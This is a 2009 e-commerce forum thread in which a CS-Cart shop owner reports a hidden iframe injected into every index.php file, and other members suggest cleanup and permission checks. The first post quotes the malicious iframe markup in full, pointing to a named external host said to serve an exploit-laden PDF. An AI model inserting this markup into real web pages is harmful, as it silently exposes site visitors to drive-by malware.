Jump to content

  • You cannot start a new topic
  • You cannot reply to this topic

http://nameashop.cn/in.cgi?income33 Rate Topic   - - - - -

 
  • hmf
  • Junior Member
  • Members
  • Join Date: 01-Feb 08
  • 19 posts

Posted 06 April 2009 - 05:58 AM #1

Hi there,

I observed this morning something weird with my site. There is a piece of code in storefront and admin, which should not been there.

<iframe src="http://nameashop.cn/in.cgi?income33" width=1 height=1 style="visibility: hidden"></iframe>

<iframe src="http://nameashop.cn/in.cgi?income33" width=1 height=1 style="visibility: hidden"></iframe>

Anyone knows what's about this? Is my pc infected (i have nod32 that says that I'm clean) or it's something on my server?

I would appreciate any answer,
Thanks

 
  • BarryH
  • Senior Member
  • Members
  • Join Date: 03-Sep 07
  • 1459 posts

Posted 06 April 2009 - 06:38 AM #2

Check this link...................................
http://www.malwaredo...ch=nameashop.cn

I would remove it and have a word with your server host.

Barry

BarryH

 

CS-Cart v4.4.3 (Plus one being developed v4.5.2 SP2)
UK User


 
  • hmf
  • Junior Member
  • Members
  • Join Date: 01-Feb 08
  • 19 posts

Posted 06 April 2009 - 07:41 AM #3

Check this link...................................
http://www.malwaredo...ch=nameashop.cn

I would remove it and have a word with your server host.

Barry


I would remove it too, but I didn't found it yet in any files. I can see it only when I look at source code from browser. It is placed before any other code.

Thanks

I found it in index.php in root.
I'm not sure if this could be an issue with my host or with cs-cart.

 
  • BarryH
  • Senior Member
  • Members
  • Join Date: 03-Sep 07
  • 1459 posts

Posted 06 April 2009 - 08:24 AM #4

hi

It is probably both. It looks like a hack and firstly I would go to your host for help.

They should be able to advise you of what to do.

I am not an expert at all so can't offer much more.

Barry

BarryH

 

CS-Cart v4.4.3 (Plus one being developed v4.5.2 SP2)
UK User


 
  • BarryH
  • Senior Member
  • Members
  • Join Date: 03-Sep 07
  • 1459 posts

Posted 06 April 2009 - 08:26 AM #5

I assume you are new?

Have you got ALL your permissions set correctly?

Barry

BarryH

 

CS-Cart v4.4.3 (Plus one being developed v4.5.2 SP2)
UK User


 
  • hmf
  • Junior Member
  • Members
  • Join Date: 01-Feb 08
  • 19 posts

Posted 06 April 2009 - 08:36 AM #6

hi

It is probably both. It looks like a hack and firstly I would go to your host for help.

They should be able to advise you of what to do.

I am not an expert at all so can't offer much more.

Barry


Thanks alot.

As I expected my hosting provider said that this issue come from my platform, not hosting. The problem is that I deleted the code from index.php but it is still visible.

 
  • BarryH
  • Senior Member
  • Members
  • Join Date: 03-Sep 07
  • 1459 posts

Posted 06 April 2009 - 08:45 AM #7

I assume you are new?

Have you got ALL your permissions set correctly?



It will all depend on the answer to this?????

You may need to restore to a previous date that does not have the OFFENDING script.

But you MUST check your permissions as per the installation instructions and remove Install.php and Rename Admin.php

Barry

BarryH

 

CS-Cart v4.4.3 (Plus one being developed v4.5.2 SP2)
UK User


 
  • BarryH
  • Senior Member
  • Members
  • Join Date: 03-Sep 07
  • 1459 posts

Posted 06 April 2009 - 08:47 AM #8

The problem is that I deleted the code from index.php but it is still visible.


This means it is planted elsewhere!!!!!!!!!

BarryH

 

CS-Cart v4.4.3 (Plus one being developed v4.5.2 SP2)
UK User


 
  • hmf
  • Junior Member
  • Members
  • Join Date: 01-Feb 08
  • 19 posts

Posted 06 April 2009 - 09:33 AM #9

This means it is planted elsewhere!!!!!!!!!


So...
All my permissions were set corectly.

I found the code in every index.php on my site. I deleted the code and I see that it's ok for now.

Thanks alot again

 
  • BarryH
  • Senior Member
  • Members
  • Join Date: 03-Sep 07
  • 1459 posts

Posted 06 April 2009 - 09:48 AM #10

That's great news, but I have concerns that if......

someone has been able to plant that code, they and others can plant more.

I don't quite understand how they have been able to do this?

Don't know what to advise, but it is quite serious.

Barry

BarryH

 

CS-Cart v4.4.3 (Plus one being developed v4.5.2 SP2)
UK User


 
  • TonyK
  • Member
  • Members
  • Join Date: 03-Mar 06
  • 1686 posts

Posted 06 April 2009 - 11:47 AM #11

I would bet money that everyone of your files named "index.php" no matter what folder has this script in it.

I had a similar situation with a Wordpress install once, all my index files had an iframe inserted.

Had to go through every file and then of course change permissions and usernames/passwords, etc, etc.
Pimpin' skins since v1.0

 
  • hmf
  • Junior Member
  • Members
  • Join Date: 01-Feb 08
  • 19 posts

Posted 10 April 2009 - 04:45 AM #12

I would bet money that everyone of your files named "index.php" no matter what folder has this script in it.

I had a similar situation with a Wordpress install once, all my index files had an iframe inserted.

Had to go through every file and then of course change permissions and usernames/passwords, etc, etc.


That's what I wrote... that every index.php file were "infected" with this iframe.

I noticed later (thanks to nod32) that this link http:// nameashop .cn/in.cgi? income33 goes to an pdf file infected with /Exploit.Agent.AFH trojan.

Anyway, I'm pretty sure that this is a cs-cart bug because all my permissions were set correctlly and definately no one has no access to my site.

 
  • TonyK
  • Member
  • Members
  • Join Date: 03-Mar 06
  • 1686 posts

Posted 11 April 2009 - 01:10 PM #13

it "could" be, are you on shared hosting? or have any other scripts on the box?
Pimpin' skins since v1.0

 
  • hmf
  • Junior Member
  • Members
  • Join Date: 01-Feb 08
  • 19 posts

Posted 13 April 2009 - 10:19 AM #14

it "could" be, are you on shared hosting? or have any other scripts on the box?


Unfortunately we are on a shared server. But, we already have prepared our own dedicated server for our site and we will "launch" it as soon as cs-cart v.2 it will be stable.